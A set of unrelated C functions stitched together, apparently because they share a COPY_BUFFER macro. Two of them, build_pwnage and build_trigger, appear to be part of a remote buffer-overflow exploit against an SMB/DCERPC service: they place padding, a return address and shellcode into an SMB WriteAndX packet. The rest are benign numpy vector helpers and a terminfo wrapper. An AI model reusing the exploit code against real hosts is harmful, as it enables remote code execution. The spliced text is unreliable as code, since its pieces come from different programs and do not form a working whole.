static void build_pwnage()
{
unsigned int n = 0;
unsigned int packet_size;
unsigned int payload_size;
unsigned char payload[256];
unsigned char *target = simple_targets[target_selection].name;
unsigned char *asmcode = simple_targets[target_selection].payload;
unsigned int asmcode_size = simple_targets[target_selection].payload_size;
unsigned int distance = simple_targets[target_selection].distance;
unsigned int ret = simple_targets[target_selection].ret;
int nopspace;
printf("[+] Building payload for [%s] [distance=%d ret=0x%08x]\n", target, distance, ret);
payload_size = sizeof(payload);
if((asmcode_size > sizeof(payload)) || ((distance + 4) > (payload_size - asmcode_size - 1))) {
printf("[+] Payload size too big\n");
exit(EXIT_FAILURE);
}
memset(payload, 0x41, sizeof(payload));
memcpy(payload + distance - 4, "BBBB", 4);
memcpy(payload + distance, &ret, 4);
//memcpy(payload + distance + 4, asmcode, asmcode_size);
nopspace = payload_size - asmcode_size - distance - 4 - 1;
if(nopspace < 0) nopspace = 0;
printf("[+] Using %d bytes for NOP space\n", nopspace);
memset(payload + distance + 4, 0x41, nopspace);
memcpy(payload + distance + 4 + nopspace, asmcode, asmcode_size);
RESET_BUFFER;
SET_SMBWRITEANDX_DATA_OFFSET(64 + payload_size - 1);
SET_SMBWRITEANDX_DATA_LEN_LOW(sizeof(DCERPC_HEADER));
SET_SMB_WRITEANDX_BYTE_COUNT(sizeof(DCERPC_HEADER) + payload_size);
packet_size = sizeof(SMB_HEADER) + sizeof(SMB_WRITEANDX_HEADER) + payload_size + sizeof(DCERPC_HEADER) - 3;
SET_NBT_HEADER_LEN(packet_size);
COPY_BUFFER(n, NBT_HEADER, sizeof(NBT_HEADER));
n += sizeof(NBT_HEADER) - 1;
COPY_BUFFER(n, SMB_HEADER, sizeof(SMB_HEADER));
n += sizeof(SMB_HEADER) - 1;
COPY_BUFFER(n, SMB_WRITEANDX_HEADER, sizeof(SMB_WRITEANDX_HEADER));
n += sizeof(SMB_WRITEANDX_HEADER) - 1;
COPY_BUFFER(n, payload, payload_size);
n += payload_size - 1;
COPY_BUFFER(n, DCERPC_HEADER, sizeof(DCERPC_HEADER));
}
/* Fetch vector data from an iterator (view or copy) */
void _fff_vector_sync_with_PyArrayIter(fff_vector* y, const PyArrayIterObject* it, npy_intp axis)
{
if (y->owner) {
PyArrayObject* ao = (PyArrayObject*) it->ao;
COPY_BUFFER(y, PyArray_ITER_DATA(it), PyArray_STRIDE(ao, axis),
PyArray_TYPE(ao), PyArray_ITEMSIZE(ao));
}
else
y->data = (double*) PyArray_ITER_DATA(it);
return;
}
static void build_trigger()
{
unsigned int n = 0;
unsigned int packet_size;
RESET_BUFFER;
packet_size = sizeof(SMB_HEADER) + sizeof(SMB_WRITEANDX_HEADER) + sizeof(DCERPC_HEADER);
SET_SMBWRITEANDX_DATA_LEN_LOW(sizeof(DCERPC_HEADER));
SET_SMB_WRITEANDX_BYTE_COUNT(sizeof(DCERPC_HEADER));
SET_NBT_HEADER_LEN(packet_size);
COPY_BUFFER(n, NBT_HEADER, sizeof(NBT_HEADER));
n += sizeof(NBT_HEADER) - 1;
COPY_BUFFER(n, SMB_HEADER, sizeof(SMB_HEADER));
n += sizeof(SMB_HEADER) - 1;
COPY_BUFFER(n, SMB_WRITEANDX_HEADER, sizeof(SMB_WRITEANDX_HEADER));
n += sizeof(SMB_WRITEANDX_HEADER) - 1;
COPY_BUFFER(n, DCERPC_HEADER, sizeof(DCERPC_HEADER));
}
static fff_vector* _fff_vector_new_from_buffer(const char* data, npy_intp dim, npy_intp stride, int type, int itemsize)
{
fff_vector* y;
size_t sizeof_double = sizeof(double);
/* If the input array is double and is aligned, just wrap without copying */
if ((type == NPY_DOUBLE) && (itemsize==sizeof_double)) {
y = (fff_vector*)malloc(sizeof(fff_vector));
y->size = (size_t)dim;
y->stride = (size_t)stride/sizeof_double;
y->data = (double*)data;
y->owner = 0;
}
/* Otherwise, output a owner contiguous vector with copied data */
else {
y = fff_vector_new((size_t)dim);
COPY_BUFFER(y, data, stride, type, itemsize);
}
return y;
}
int _t3_tigetflag(const char *name) {
/* Copy the name into a new buffer, because tigetflag expects a char *
not a const char *. */
COPY_BUFFER(name);
return tigetflag(name_buffer);
}
